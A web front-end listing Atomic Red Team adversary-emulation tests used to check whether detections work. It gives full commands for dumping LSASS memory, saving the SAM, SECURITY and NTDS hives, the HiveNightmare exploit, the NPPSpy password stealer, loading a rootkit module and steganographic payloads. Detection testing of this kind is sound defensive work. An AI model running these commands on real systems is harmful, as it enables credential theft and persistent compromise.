Issue is, it's just a bunch of YAML/MD files in a git tree. That's where I come in: I'm a sleek front-end to quickly search / filter Atomic Red Team tests. It's also for idiots like me who forget flags for commands I've run millions of times: what're the flags for adding a new local user in Windows again?
This page pulls fresh Atomic Red Team data every 24 hours (last: 2025-10-18) like magic. For feedback / words of affirmation: artatharrisonmdotcom. For test case updates, throw it upstream and it'll float down. For custom test cases: I'm thinking about it. Inspired by: a nightmare I had where a scruffy South African man yelled at me because I couldn't recite xfreerdp flags by heart.
Description: This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball)
within an image.
The test begins by ensuring the availability of the image file and the tarball file containing data. It then generates random passwords and saves them to a
file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image
file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball
file within the image, utilizing steganography techniques for data obfuscation.
This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected.
By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
Prereq: Image file must exist
if (!(Test-Path "T1001.002\bin\T1001.002.jpg")) {exit 1} else {exit 0}
Prereq: File to hide within tarz file must exist
if (!(Test-Path "$env:TEMP\random_passwords.txt")) {exit 1} else {exit 0}
Prereq: Tarz file to embed in image must exist
if (!(Test-Path "$env:PUBLIC\Downloads\T1001.002.tarz")) {exit 1} else {exit 0}
Description: This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file.
The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden
within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden
PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a
separate PowerShell script (textExtraction.ps1). Finally, the textExtraction.ps1 script is executed.
In the case of this atomic test, the malicious image file that is downloaded has the PowerShell command Start-Process notepad embedded within it in base64. This
is done to emulate an attacker's behaviour if they were to execute malware embedded within the image file.
Prereq: Image file must exist
if (!(Test-Path "T1001.002\bin\evil_kitten.jpg")) {exit 1} else {exit 0}
Prereq: Extract-Invoke-PSImage must exist
if (!(Test-Path "ExternalPayloads\Extract-Invoke-PSImage.ps1")) {exit 1} else {exit 0}
Description: This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
Prereq: ProcDump tool from Sysinternals must exist on disk at specified location (..\ExternalPayloads\procdump.exe)
if (Test-Path "..\ExternalPayloads\procdump.exe") {exit 0} else {exit 1}
Cleanup:
del "C:\Windows\Temp\lsass_dump.dmp" >nul 2> nul
T1003.001 - OS Credential Dumping: LSASS Memory
Dump LSASS.exe Memory using comsvcs.dll
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
Dump LSASS.exe Memory using direct system calls and API unhooking
"..\ExternalPayloads\Outflank-Dumpert.exe"
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\windows\temp\dumpert.dmp.
If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first.
Prereq: Dumpert executable must exist on disk at specified location (..\ExternalPayloads\Outflank-Dumpert.exe)
if (Test-Path "..\ExternalPayloads\Outflank-Dumpert.exe") {exit 0} else {exit 1}
Description: The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanodump.dmp file in the temp directory.
Prereq: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
if (Test-Path ..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
Cleanup:
del "%temp%\nanodump.dmp" >nul 2> nul
T1003.001 - OS Credential Dumping: LSASS Memory
Dump LSASS.exe Memory using Windows Task Manager
{MISSING IN ATOMIC RED TEAM}
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
Prereq: Mimikatz must exist on disk at specified location (..\ExternalPayloads\x64\mimikatz.exe)
if (Test-Path "..\ExternalPayloads\x64\mimikatz.exe") {exit 0} else {exit 1}
Prereq: Lsass dump must exist at specified location (%tmp%\lsass.DMP)
cmd /c "if not exist %tmp%\lsass.DMP (exit /b 1)"
T1003.001 - OS Credential Dumping: LSASS Memory
LSASS read with pypykatz
"..\ExternalPayloads\venv_t1003_001\Scripts\pypykatz" live lsa
Description: Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed; use the get_prereq_commands to meet the prerequisites for this test.
Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This test uses a pure
PowerShell implementation that calls the MiniDumpWriteDump Win32 API.
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
Author of Out-Minidump: Matthew Graeber (@mattifestation)
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
Prereq: ProcDump tool from Sysinternals must exist on disk at specified location (..\ExternalPayloads\procdump.exe)
if (Test-Path "..\ExternalPayloads\procdump.exe") {exit 0} else {exit 1}
Description: Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an "access denied" error, which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privileges, you will see this error near the bottom of the output: "ERROR kuhl_m_sekurlsa_acquireLSA".
Description: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
Prereq: Computer must have xordump.exe
if (Test-Path 'C:\Windows\Temp\xordump.exe') {exit 0} else {exit 1}
Description: The memory of lsass.exe is often dumped for offline credential theft attacks.
This can be achieved with lolbin rdrleakdiag.exe.
Upon successful execution, you should see the following files created, $env:TEMP\minidump_.dmp and $env:TEMP\results_.hlk.
Description: WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a
memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism
introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger
specific actions for a monitored process in one of two scenarios: either the process terminates
itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API.
The major advantage of this technique is that it does not cause lsass.exe to crash, and since
WerFault.exe is used to create file dumps all the time (not just lsass.exe), this method provides
the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process;
from an attacker's standpoint this is appealing because their illicit credential extraction will
appear benign, since from a defender's viewpoint it is within the realm of normal activity.
Upon successful execution, you should find the dump file in directory of your choice or "%temp%\SilentProcessExit" by default.
Prereq: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
if (Test-Path ..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
T1003.002 - OS Credential Dumping: Security Account Manager
Registry dump of SAM, creds, and secrets
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
Description: Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys and then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.
Cleanup:
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
T1003.002 - OS Credential Dumping: Security Account Manager
Registry parse with pypykatz
"..\ExternalPayloads\venv_t1003_002\Scripts\pypykatz" live lsa
Description: Parses registry hives to obtain stored credentials.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
Description: Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
Cleanup:
del %temp%\SAM >nul 2>&1
T1003.002 - OS Credential Dumping: Security Account Manager
PowerDump Hashes and Usernames from Registry
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
Description: Executes a hashdump by reading the hashes from the registry.
Prereq: PowerDump script must exist on disk at specified location
if (Test-Path "..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
T1003.002 - OS Credential Dumping: Security Account Manager
dump volume shadow copy hives with certutil
for /L %a in (1,1,10) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\SAM" %temp%\SAMvss%a 2 >nul 2>&1) & dir /B %temp%\SAMvss*
Description: Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
Cleanup:
for /L %a in (1,1,10) do @(del %temp%\SAMvss%a >nul 2>&1)
T1003.002 - OS Credential Dumping: Security Account Manager
Description: Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. This test uses reg export to perform this behavior.
Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.
Cleanup:
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
T1003.003 - OS Credential Dumping: NTDS
Create Volume Shadow Copy with vssadmin
vssadmin.exe create shadow /for=C:
Description: This test is intended to be run on a Domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVE
Description: This test is intended to be run on a Domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
if not exist \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 (exit /b 1)
Prereq: Extract path must exist
if not exist C:\Windows\Temp (exit /b 1)
Cleanup:
del "C:\Windows\Temp\ntds.dit" >nul 2> nul
del "C:\Windows\Temp\VSC_SYSTEM_HIVE" >nul 2> nul
del "C:\Windows\Temp\SYSTEM_HIVE" >nul 2> nul
T1003.003 - OS Credential Dumping: NTDS
Dump Active Directory Database with NTDSUtil
mkdir C:\Windows\Temp\ntds_T1003
ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\ntds_T1003" q q
Description: This test is intended to be run on a Domain Controller.
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
Description: This test is intended to be run on a Domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Description: This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Prereq: Target must be a reachable Domain Controller, and current context must be domain admin
wmic /node:"localhost" shadowcopy list brief
T1003.003 - OS Credential Dumping: NTDS
Create Volume Shadow Copy remotely (WMI) with esentutl
Description: This test is intended to be run from a remote workstation with domain admin context.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
Prereq: Target must be a reachable Domain Controller, and current context must be domain admin
Description: This test is intended to be run on a Domain Controller.
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
Description: This test is intended to be run on a Domain Controller.
The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
Description: This test is intended to be run on a Domain Controller.
An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit.
T1003.004 - OS Credential Dumping: LSA Secrets
Dumping LSA Secrets
"..\ExternalPayloads\T1003.004\bin\PsExec.exe" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
Description: Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
Prereq: PsExec from Sysinternals must exist on disk at specified location (..\ExternalPayloads\T1003.004\bin\PsExec.exe)
if (Test-Path "..\ExternalPayloads\T1003.004\bin\PsExec.exe") {exit 0} else {exit 1}
Description: This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type.
If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session.
Ref: https://github.com/MzHmO/PowershellKerberos/
Author of dumper.ps1: Michael Zhmaylo (@MzHmO)
T1003.005 - OS Credential Dumping: Cached Domain Credentials
Cached Credential Dump via Cmdkey
cmdkey /list
Description: List credentials currently stored on the host via the built-in Windows utility cmdkey.exe.
Credentials listed with Cmdkey only pertain to the current user.
Passwords will not be displayed once they are stored.
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
Description: Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
[Reference](https://adsecurity.org/?p=1729)
Prereq: Mimikatz executor must exist on disk and at specified location (%tmp%\mimikatz\x64\mimikatz.exe)
Description: The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
Prereq: DSInternals must be installed
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1}
# Check that the module actually exports the cmdlet this test runs (the original looked up 'DSInternals', which is the module name, not a command, so the check could never pass)
if (-not $RequiredModule.ExportedCommands['Get-ADReplAccount']) {exit 1} else {exit 0}
T1003.007 - OS Credential Dumping: Proc Filesystem
Description: Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
Prereq: Script to launch target process must exist
test -f /tmp/T1003.007.sh
grep "T1003.007" /tmp/T1003.007.sh
Cleanup:
rm -f "/tmp/T1003.007.bin"
T1003.007 - OS Credential Dumping: Proc Filesystem
Dump individual process memory with sh on FreeBSD (Local)
Description: Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
Prereq: Script to launch target process must exist
test -f /tmp/T1003.007.sh
grep "T1003.007" /tmp/T1003.007.sh
Cleanup:
rm -f "/tmp/T1003.007.bin"
T1003.007 - OS Credential Dumping: Proc Filesystem
Dump individual process memory with Python (Local)
sh /tmp/T1003.007.sh
PID=$(pgrep -n -f "T1003.007")
PYTHON=$(which python || which python3 || which python2)
$PYTHON T1003.007/src/dump_heap.py $PID /tmp/T1003.007.bin
grep -i "PASS" "/tmp/T1003.007.bin"
Description: Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
Prereq: Script to launch target process must exist
test -f /tmp/T1003.007.sh
grep "T1003.007" /tmp/T1003.007.sh
Prereq: Requires Python
(which python || which python3 || which python2)
Cleanup:
rm -f "/tmp/T1003.007.bin"
T1003.007 - OS Credential Dumping: Proc Filesystem
Description: MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
Prereq: MimiPenguin script must exist on disk at specified location (/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh)
if [ -f "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh" ]; then exit 0; else exit 1; fi;
Prereq: Strings must be installed
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
Prereq: Python2 must be installed
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
Prereq: Libc-bin must be installed
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
Cleanup:
rm -f /tmp/T1003.007Test3.txt > /dev/null
T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow
Description: Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
Cleanup:
rm -f /tmp/T1003.008.txt
T1003 - OS Credential Dumping
Gsecdump
"..\ExternalPayloads\gsecdump.exe" -a
Description: Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username entries followed by two 32-character hashes.
If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus.
You will receive only error output if you do not run this test from an elevated context (run as administrator).
If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
Prereq: Gsecdump must exist on disk at specified location (..\ExternalPayloads\gsecdump.exe)
if (Test-Path "..\ExternalPayloads\gsecdump.exe") {exit 0} else {exit 1}
T1003 - OS Credential Dumping
Credential Dumping with NPPSpy
Copy-Item "..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
Description: Changes the ProviderOrder registry key parameter and creates the key for NPPSpy.
After the user logs in, the cleartext password is saved in C:\NPPSpy.txt.
Cleanup deletes the files and reverses the registry changes.
NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
Prereq: NPPSpy.dll must be available in ExternalPayloads directory
if (Test-Path "..\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
Description: The svchost.exe process contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
Description: AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
Prereq: IIS must be installed prior to running the test
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
T1003 - OS Credential Dumping
Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
Description: AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
Prereq: IIS must be installed prior to running the test
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
T1003 - OS Credential Dumping
Dump Credential Manager using keymgr.dll and rundll32.exe
rundll32.exe keymgr,KRShowKeyMgr
Description: This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows exporting stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials and get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieved in multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.).
Reference: https://twitter.com/0gtweet/status/1415671356239216653
T1003 - OS Credential Dumping
Send NTLM Hash with RPC Test Connection
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM 1>$Null
Description: RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Ref: https://twitter.com/vysecurity/status/974806438316072960
T1005 - Data from Local System
Search files of interest and save them to a single zip file (Windows)
Description: An adversary may know/assume that the user of a system uses sqlite databases which contain interesting and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
Prereq: Check if running on a Debian based machine.
if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
Description: This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
On success, a hex dump of the first 11 bytes of the volume is displayed.
For a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))):
```
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS
```
T1007 - System Service Discovery
System Service Discovery
tasklist.exe
sc query
sc query state= all
Description: Identify system services.
Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
T1007 - System Service Discovery
System Service Discovery - net.exe
net.exe start >> %temp%\service-list.txt
Description: Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
Upon successful execution, net.exe will run from cmd.exe and query services. Expected output is a txt file in the temp directory called service-list.txt.
Cleanup:
del /f /q /s %temp%\service-list.txt >nul 2>&1
T1007 - System Service Discovery
System Service Discovery - systemctl/service
if [ "$(uname)" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;
Description: Enumerates system services using systemctl/service.
T1007 - System Service Discovery
Get-Service Execution
powershell.exe Get-Service
Description: Executes the Get-Service cmdlet to gather objects representing all services on the local system.
Description: Compiles and executes C# code to list main window titles associated with each process.
Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
Prereq: T1010.cs must exist on disk at specified location (T1010\src\T1010.cs)
if (Test-Path "T1010\src\T1010.cs") {exit 0} else {exit 1}
Description: Query Windows Registry.
Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).
References:
https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
Description: Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem.
Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation.
Description: This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file.
An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes.
See: https://www.mandiant.com/resources/hunting-com-objects
Description: The reg query commands check the status of the AlwaysInstallElevated registry key for both the user and the machine. If both queries return a value of 0x1, AlwaysInstallElevated is enabled for both user and machine, allowing a regular user to install a Microsoft Windows Installer package with system-level privileges. An attacker can abuse this to escalate privileges on the host to SYSTEM.
T1012 - Query Registry
Check Software Inventory Logging (SIL) status via Registry
Description: Microsoft's Software Inventory Logging (SIL) collects information about the software installed on each host. An adversary can use such logs to passively
check for the existence of software of interest to them. The status of SIL can be checked via the registry.
[Reference](https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/)
Description: The objective of this test is to query the SystemStartOptions key under HKLM\SYSTEM\CurrentControlSet\Control in the Windows registry. This could be used to uncover specific details about how the system is configured to start, potentially aiding in understanding boot parameters or identifying security-related settings.
T1014 - Rootkit
Loadable Kernel Module based Rootkit
sudo insmod T1014/bin/T1014.ko
Description: Loadable Kernel Module based Rootkit
Prereq: The kernel module must exist on disk at specified location (T1014/bin/T1014.ko)
if [ -f T1014/bin/T1014.ko ]; then exit 0; else exit 1; fi;
Cleanup:
sudo rmmod T1014
sudo rm -rf T1014/bin
T1014 - Rootkit
Loadable Kernel Module based Rootkit
sudo modprobe T1014
Description: Loadable Kernel Module based Rootkit
Prereq: The kernel module must exist on disk at specified location (T1014/src/Linux/T1014.ko)
if [ -f /lib/modules/$(uname -r)/T1014.ko ]; then exit 0; else exit 1; fi;
T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
Check internet connection using ping Windows
ping -n 4 8.8.8.8
Description: Check internet connection using ping on Windows. The default target of the ping is 8.8.8.8 (Google Public DNS).
T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
Check internet connection using ping freebsd, linux or macos
ping -c 4 8.8.8.8
Description: Check internet connection using ping on Linux or macOS. The default target of the ping is 8.8.8.8 (Google Public DNS).
T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
Test-NetConnection -ComputerName 8.8.8.8
Description: Check internet connection using PowerShell's Test-NetConnection cmdlet and the ICMP/Ping protocol. The default target is 8.8.8.8 (Google Public DNS).
T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)
Description: Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound HTTP (Port 80) access. The default target is www.google.com.
T1016.001 - System Network Configuration Discovery: Internet Connection Discovery
Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)
Description: Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound SMB (Port 445) access. The default target is 8.8.8.8.
T1016.002 - System Network Configuration Discovery: Wi-Fi Discovery
Enumerate Stored Wi-Fi Profiles And Passwords via netsh
netsh wlan show profile * key=clear
Description: Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
T1016 - System Network Configuration Discovery
System Network Configuration Discovery on Windows
ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config
Description: Identify network configuration information
Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
T1016 - System Network Configuration Discovery
List Windows Firewall Rules
netsh advfirewall firewall show rule name=all
Description: Enumerates Windows Firewall Rules using netsh.
